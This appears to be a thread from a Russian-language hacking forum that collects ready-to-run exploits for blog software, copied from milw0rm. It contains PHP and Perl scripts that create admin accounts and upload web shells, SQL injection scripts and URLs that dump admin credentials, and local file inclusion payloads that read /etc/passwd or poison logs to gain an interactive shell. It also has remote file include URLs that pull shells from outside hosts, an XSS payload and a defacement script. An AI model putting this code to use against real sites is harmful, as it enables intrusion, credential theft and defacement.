44 function load_tpl ($path)
45 {
46 $tpl = '';
47 global $tpl_block;
48
49 if (substr ($path, -4) == '.tpl')
50 {
51 if (strpos (Cur_Url (), 'includes%2F') OR strpos (Cur_Url (), 'admin%2F') OR strpos (Cur_Url (), 'members%2F')) $path = '../'.$path;
52 if (!file_exists ($path)) die ("<B>Template $path not found! Contact webmaster.</B>");
53 $fp = fopen($path,'r');
54 while(!feof($fp)) $tpl .= fgets($fp,4096);
55 fclose ($fp);
56 }
...
load_tpl() 'loading a template file into a varible.' ;]
./index.php, 24-30:
...
24 // proses cmd
25 switch ($mode)
26 {
27 case 'page':
28 $txt['main_body'] = quick_tpl (load_tpl ($config['skin']."/$page.tpl"), 0);
29 flush_tpl ();
30 break;
...
(%69%6E%63%6C%75%64%65%73 = includes)
http://[host]/[path]/index.php?mode=page&page=../../%69%6E%63%6C%75%64%65%73/db_config.php%00
http://[host]/[path]/index.php?mode=page&page=../../../../../../../../etc/passwd%00
Quick and Dirty Blog 0.4 Local File Inclusion
/categories.php?theme=../../../../../../../../../etc/passwd%00
LightBlog 8.4.1.1 Remote Code Execution
PHP код:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
LightBlog 8.4.1.1 Remote Code Execution Exploit
by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>
Thanks to rgod for the php code and Marty for the Love
";
if ($argc<3) {
echo "Usage: php ".$argv[0]." Host Path
Host: target server (ip/hostname)
Path: path of lightblog
Example:
php ".$argv[0]." localhost /lightblog/ dir";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$cmd.=" ".$argv[$i];
}
$cmd=urlencode($cmd);
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "Step 0 - If Shell already exists, run it..\r\n";
$packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"666999"))
{
echo "Exploit succeeded...\r\n";
$temp=explode("666999",$html);
die("\r\n".$temp[1]."\r\n");
}
echo 'Step 1 - Creating New User (Name: Piggy_Marty Pwd: DAFORNO_IMPERAT)..';
//Retrieving the "confirmation" code
$packet ="GET ".$p."register.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
preg_match('#<b>([a-zA-Z0-9]+?)</b><input name="rand" type="hidden" value="([a-zA-Z0-9]+?)" />#is', $html, $fuori);
$conf_code = $fuori[1];
$rand_code = $fuori[2];
//Doing the registration
$data="rand=$rand_code&val=$conf_code&username_post=Piggy_Marty&pwd1_post=DAFORNO_IMPERAT&pwd2_post=DAFORNO_IMPERAT&name_post=Piggy_Marty&email_post=hawkgotyou@gmail.com";
$packet="POST ".$p."register.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: localhost\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
echo 'Step 2 - Promoting Piggy_Marty to admin level..';
$data="type_post=admin&username_post=Piggy_Marty";
$packet="POST ".$p."cp_memberedit.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: localhost\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
echo 'Step 3 - Uploading Shell Creator..';
$data="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"image\"; filename=\"piggy_marty_creator.php\"\r\n";
$data.="Content-Type:\r\n\r\n";
$data.="<?php
\$fp=fopen('piggy_marty.php','w');
fputs(\$fp,'<?php error_reporting(0);
set_time_limit(0);
if (get_magic_quotes_gpc()) {
\$_GET[cmd]=stripslashes(\$_GET[cmd]);
}
echo 666999;
passthru(\$_GET[cmd]);
echo 666999;
?>');
fclose(\$fp);
chmod('piggy_marty.php',777);
?>\r\n";
$data.='-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="title"
Not so good if you see this..
-----------------------------7d529a1d23092a
Content-Disposition: form-data; name="post"
An Exploit has attacked your site.. contact hawkgotyou@gmail.com for more details
-----------------------------7d529a1d23092a--
';
$packet="POST ".$p."main.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/\r\n";
$packet.="Cookie: Lightblog_username=Piggy_Marty&Lightblog_password=DAFORNO_IMPERAT\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
echo 'Step 4 - Executing Creator..';
$packet ="GET ".$p."images/piggy_marty_creator.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);
echo "Step 5 - Execute Commands..\r\n";
$packet ="GET ".$p."images/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"666999"))
{
echo "Exploit succeeded...\r\n";
$temp=explode("666999",$html);
die("\r\n".$temp[1]."\r\n");
}
# Coded With BH Fast Generator v0.1
?>
# milw0rm.com [2007-10-09]
Furkan Taştan Blog SQL Injection
Username : /kategori.asp?kat=goster&id=-1+union+select+0,1,adkull,3,4,5,6,7,8+from+ayar
Password : /kategori.asp?kat=goster&id=-1+union+select+0,1,adsif,3,4,5,6,7,8+from+ayar
JBlog 1.0 SQL Injection
PHP код:
##################################################
# Script....................................: JBlog ver 1.0
# Script Site...........................: http://www.jmuller.net/jblog/index.php
# Vulnerability........................: Remote SQL injection Exploit
# Access..................................: Remote
# level......................................: Dangerous
# Author..................................: S4mi
# Contact.................................: S4mi[at]LinuxMail.org
##################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 .....
#
##################################################
#Vuln :
#http://127.0.0.1/jblog/index.php?id=[SQL]
#http://127.0.0.1/jblog/admin/modifpost.php?id=[SQL] (shoud have access to admin area "use my last JBlog Xploit")
#Probably Other files are affected
#*************************************
#Usage : C:\Xploit.pl 127.0.0.1 /Jblog/
#Result Screen Shout :
#*************************************
# Connecting ...[OK]
# Sending Data ...[OK]
#
# + Exploit succeed! Enjoy.
# + ---------------- +
# + Password: e10adc3949ba59abbe56e057f20f883e
# + Username: admin
###################################################
#!/usr/bin/perl
use IO::Socket ;
&header();
&usage unless(defined($ARGV[0] && $ARGV[1]));
$host = $ARGV[0];
$path = $ARGV[1];
syswrite STDOUT ,"\n Connecting ...";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "\n Unable to connect to $host\n" unless($sock);
syswrite STDOUT, "[OK]";
$inject = "union%20select%200,login,pass,3,4,5%20from%20auteur%20WHERE%20id=1/*";
syswrite STDOUT ,"\n Sending Data ...";
print $sock "GET $path/index.php?id='$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";
syswrite STDOUT ,"[OK]\n\n";
while($answer = <$sock>){
if ($answer =~ /class='titre'>(.*?)<\/span>/){
print "+ Exploit succeed! Enjoy.\n";
print "+ ---------------- +\n";
print "+ Password: $1\n";
}
if($answer =~ / '(.*?)' /){
print "+ Username: $1\n";
}
}
sub usage{
print "\nUsage : perl $0 host /path/ ";
print "\nExemple : perl $0 www.victim.com /JBlog/\n";
exit(0);
}
sub header(){
print q(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script.................: JBlog ver 1.0
Script Site............: http://www.jmuller.net/jblog/index.php
Vulnerability..........: Remote SQL injection Exploit
Access.................: Remote
level..................: Dangerous
Author.................: S4mi
Contact................: S4mi[at]LinuxMail.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}
# milw0rm.com [2007-09-14]
|
|
|
|
09.06.2008, 06:03
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
SimpleBlog 3.0 SQL Injection
PHP код:
#!/usr/bin/perl
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
# SimpleBlog 3.0 [ comments_get.asp ] #
# ] Remote SQL Injection [ #
# #
# [c]ode by TrinTiTTY [at] g00ns.net #
# Vulnerability by MurderSkillz #
# #
# shoutz: z3r0, kat, str0ke, rezen, fish, wicked, clorox, #
# Canuck, a59, sess, bernard, + the rest of g00ns #
# [irc.g00ns.net] [www.g00ns.net] [ts.g00ns.net] #
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
use LWP::UserAgent;
$host = @ARGV[0];
$ua = LWP::UserAgent->new;
my $inject ='comments_get.asp?id=-99%20union%20all%20select%201,2,uUSERNAME,4,uPASSWORD,6,7,8,9%20from%20T_USERS';
if (@ARGV < 1){&top( );&usage( )}
elsif ($host =~ /http:\/\//){print"\n\n [-] Don't use http:// in host\n";exit( 0 );}
else { &xpl( ) }
sub xpl( ) {
&top( );
print "\n [~] Connecting\n";
$res = $ua->get("http://$host/$inject");
$con = $res->content;
print "\n [~] Checking for admin info\n";
if ($con =~ /<strong>([-_+.\w]{1,15})<\/strong>/gmi)
{
print "\n\t [+] Admin user: $1\n";
}
if ($con =~ /<a href\=\"http:\/\/(.*)\" target\=\"\_blank\">(.*)<\/a>/gmi)
{
print "\n\t [+] Admin password: $2\n";
print "\n [+] Complete\n";
}
else {
print "\n [-] Unable to retrieve admin info\n";
exit(0);
}
}
sub top( )
{
print q {
##################################################################
# SimpleBlog 3.0 [ comments_get.asp ] #
# ] Remote SQL Injection [ #
# #
# [c]ode by TrinTiTTY [at] g00ns.net #
# Vulnerability by MurderSkillz #
##################################################################
}
}
sub usage( )
{
print "\n Usage: perl simpleblog3.pl <host>\n";
print "\n Example: perl simpleblog3.pl www.example.com/path\n\n";
exit(0);
}
# milw0rm.com [2007-07-28]
BlogSite Professional SQL Injection
Код:
http://www.server.com/index.php?page_id=-1&news_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6/**/FROM/**/websiteadmin_admin_users/*
6ALBlog SQL Injection
Код:
http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,concat(user,0x3a,pass),3,4,5,6,7%20from%20blog_users/*
BlogMe 3.0 SQL Injection
Код:
/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin
Archangel Weblog 0.90.02 Local File Inclusion
Код:
http://Target.com/blog/index.php?index=../../../../etc/passwd%00
sBLOG 0.7.3 Beta Local File Inclusion
PHP код:
#!/usr/bin/perl
# sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit
# D.Script: http://sourceforge.net/projects/sblog/
# V.Code:
# if(isset($conf_lang_default) && file_exists('lang/' . $conf_lang_default . '.php'))
# require('lang/' . $conf_lang_default . '.php');
# Discovered & Coded by : GolD_M = [Mahmood_ali]
# Contact:HackEr_@w.Cn
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Thanx : w4ck1ng.com & cyb3rt & 020
use IO::Socket;
use LWP::Simple;
#ripped
@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
if (@ARGV < 3) {
print "
===============================================================
# sBLOG 0.7.3 Beta(inc/lang.php)Local File Inclusion Exploit #
# Gold.pl [Victim] / (apachepath) #
# Ex: Gold.pl [Victim] / ../logs/error.log #
===============================================================
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group #
# Thanx : w4ck1ng.com & cyb3rt & 020 #
===============================================================
";
exit();
}
$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];
print "Code is injecting in logfiles...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "If not working try another apache path\n\n";
print "[shell] ";$cmd = <STDIN>;
while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
#now include parameter
print $socket "GET ".$path."/inc/lang.php?conf_lang_default=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
while ($raspuns = <$socket>)
{
print $raspuns;
}
print "[shell] ";
$cmd = <STDIN>;
}
# milw0rm.com [2007-03-29]
WBBlog (XSS/SQL)
Код:
index.php?cmd=viewentry&e_id=-1/**/UNION/**/SELECT/**/null,null,u_email,null,u_password,null/**/FROM/**/user/*
index.php?cmd=viewentry&e_id="><script>alert('Anti chat')</script>
WebLog File Disclosure
http://localhost/blog/index.php?show=showarticles&file=../../../../windows/php.ini
http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
http://localhost/blog/index.php?show=showarticles&file=../admin.php <<< username&password(md5)
BP Blog 7.0 SQL Injection
Код:
http://www.Site.Com/Path/default.asp?layout=-1%20%20union%20select%201,fldauthorusername,fldauthorpassword,1,1,1,1%20from%20tblauthor%20where%201=1
Админка:
b2 Blog <= 0.5 Remote File Include
Код:
http://www.site.***/[path]/b2verifauth.php?index=http://mdxshell.txt?
BLOG:CMS <= 4.1.3 Remote Inclusion
Код:
http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin
WikyBlog 1.3.2 Local File Inclusion
PHP код:
#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# WikyBlog Local File Inclusion Exploit #
#################################################################################################
# Software: WikyBlog 1.3 #
# #
# Vendor: http://www.wikyblog.com/ #
# #
# Released: 2006/12/01 #
# #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) #
# #
# Note: The information provided in this document is for WikyBlog administrator #
# testing purposes only! #
# #
# This exploit makes use of a local file inclusion exploit in #
# WikyBlog to allow command execution. Firstly it locates an #
# access_log, or error_log then it inserts a PHP Shell into #
# the log file and returns a link for command execution. #
# #
# include/WBmap.php?l=file_to_include%00 #
# register_globals being on does not affect this vulnerability #
#################################################################################################
use IO::Socket;
use Switch;
$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$folder = @ARGV[1]; # /wikyblog/
sub Header()
{
print q {#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# WikyBlog Local File Inclusion Exploit #
#################################################################################################
};
}
sub Usage()
{
print q {Usage: wikyblogxpl1.3.pl [target] [folder]
Example: wikyblogxpl1.3.pl localhost /wikyblog/
};
exit();
}
Header();
if (!$target || !$folder) {
Usage(); }
# log list taken from Kacper's http://www.milw0rm.com/exploits/2253
@paths=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
print "[+] Attempting to locate log file\n";
$log = "";
foreach $path (@paths)
{
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $sock "GET ".$folder."include/WBmap.php?l=".$path."%00 HTTP/1.1\n";
print $sock "Host: $target\n";
print $sock "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $sock "Accept: text/html\n";
print $sock "Connection: close\n\n\r\n";
#locate log file part taken from Kacper's http://www.milw0rm.com/exploits/2253
$out = "";
while ($answer = <$sock>) {
$out.=$answer; }
close($sock);
if ($out =~ m/_exppl_(.*?)_exppl_/ms) {
print "[+] Log file found! [".$path."] \n";
$log = $path; }
}
if ($log eq "") {
print "[-] Log file not found. Exiting...\n"; exit(); }
print "[+] Inserting PHP Shell into logs\n";
$code = "<?php ob_clean(); echo ".$cmdfunct."(\$_GET['cmd']); die(); ?>";
$xpl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect. Exiting...\r\n";
print $xpl "GET /".$code." HTTP/1.1\n";
print $xpl "Host: $target\n";
print $xpl "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpl "Accept: text/html\n";
print $xpl "Connection: close\n\n\r\n";
print "[+] Sent code...\n";
print "[!] Command execution at: ".$target.$folder."include/WBmap.php?l=".$log."%00";
# milw0rm.com [2006-12-01]
SimpleBlog <= 2.3 SQL Injection
Код:
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users
BrewBlogger 1.3.1 SQL Injection
PHP код:
#!/usr/bin/perl
###########################################################################################
#Target:
#
# BewBlogger 1.3.1
# http://brewblogger.zkdigital.com
#
#Vulnerability:
#
# SQL Injection
#
#Description:
#
# BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php.
# Since each user entry contains an auto-incrementing ID number, it is possible to
# enumerate all user names and passwords stored in the 'users'database by iterating
# through every possible ID number.
#
#Vulnerable Code (truncated):
#
# $colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']);
# $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
# $log = mysql_query($query_log, $brewing) or die(mysql_error());
#
#Usage:
# This script will produce a URL which will reveal the user name and password for
# the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for
# the first user). The user name will be listed as "Method:" under 'General
# Information', and the password will be listed as "Cost:".
#
#Usage:
# ./brewblog.pl <domain name + path> [user id]
#
#Examples:
#
# ./brewblogger.pl www.beerblog.com 3
# ./brewblogger.pl www.mysite.com/beerblog
#
#Google Dork:
#
# intext:"BrewBlogger for PHP"
#
#Discovery/code:
#
# Craig Heffner
# heffnercj [at] gmail.com
# http://www.craigheffner.com
###########################################################################################
print '
###########################################
# BrewBlogger 1.3.1 SQL Injection Exploit #
# #
# Discovered and coded by: Craig Heffner #
###########################################
';
if(!$ARGV[0] || $ARGV[0] eq "-h"){
print "\nUsage: ./brewlogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n";
exit;
}
if(!$ARGV[1]){
$id = 2;
} else {
$id = $ARGV[1];
}
$url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+";
$a = 1;
while($a < 211){
if($a == 8){
$string .= "user_name,";
} elsif($a == 9){
$string .= "password,";
} elsif($a == 210){
$string .= "1";
} else {
$string .= "1,";
}
$a++;
}
print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WHERE+id=" . $id . "\n";
exit;
# milw0rm.com [2006-11-10]
IrayoBlog 0.2.4 Remote File Include
Код:
http://[target]/[path]/inc/irayofuncs.php?irayodirhack=http://evilsite.com/shell?
vBlog / C12 0.1 Remote File Include
http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?
|
|
|
|
09.06.2008, 06:15
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Light Blog Multiple Vulnerabilities
PHP код:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "\r\n";
echo "Light Blog Multiple Vulnerabilities Exploit\r\n";
echo "by BlackHawk <hawkgotyou@gmail.com>\r\n";
echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." Site Path AttackType Related\r\n";
echo "Host: target server (ip/hostname)\r\n";
echo "Path: path to LightBlog\r\n";
echo "AttackType: 1 - Create New Post (Title must be of one word)\r\n";
echo " |-> Related: Title Post\r\n";
echo " |-> Es: php ".$argv[0]." localhost /blog/ 1 Hacked I Got You\r\n\r\n";
echo " 2 - Deface Blog (With XSS)\r\n";
echo " |-> Related: WebPage\r\n";
echo " |-> Es: php ".$argv[0]." localhost /blog/ 2 http://site.com/\r\n\r\n";
echo " 3 - Deface Blog (Deleting blog.php)\r\n";
echo " |-> Related: NickName\r\n";
echo " |-> Es: php ".$argv[0]." localhost /blog/ 3 BlackHawk\r\n\r\n";
echo "";
echo "\r\n";
echo "";
die;
}
/*
There are some critical vulnerabilities in this quite simple Blog Engine..
1 - You do not need to know the right password to send a new Post (no cecking);
2 - You can erase (even with mq=on) all file that are stored on the server:
[...]
$t = stripslashes($t);
[...]
$fc = fopen ("blog_comments/$t.txt", "w");
fwrite ($fc, "");
[...]
3-Using point No 1 you can do some XSS couse there isn't any anti-Xss code for admins
4-If mq=on than you can deface the site (but no injecting PHP cause < and > are properly parsed)
sorry for my bad english,
BlackHawk hawkgotyou@gmail.com
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
switch($attack_type)
{
case 1: //Insert New Post
$title=$argv[4];
$message="";
for ($i=5; $i<=$argc-1; $i++){
$message.=" ".$argv[$i];
}
$title=urlencode($title);
$message=urlencode($message);
echo "Attack No 1 - Sending New Post..\r\n";
$data="t=$title";
$data.="&c=$message";
$data.="&Submit=Post";
$packet="POST ".$p."LightBlog/blog_script.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Referer: http://".$host.$path."/blog.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
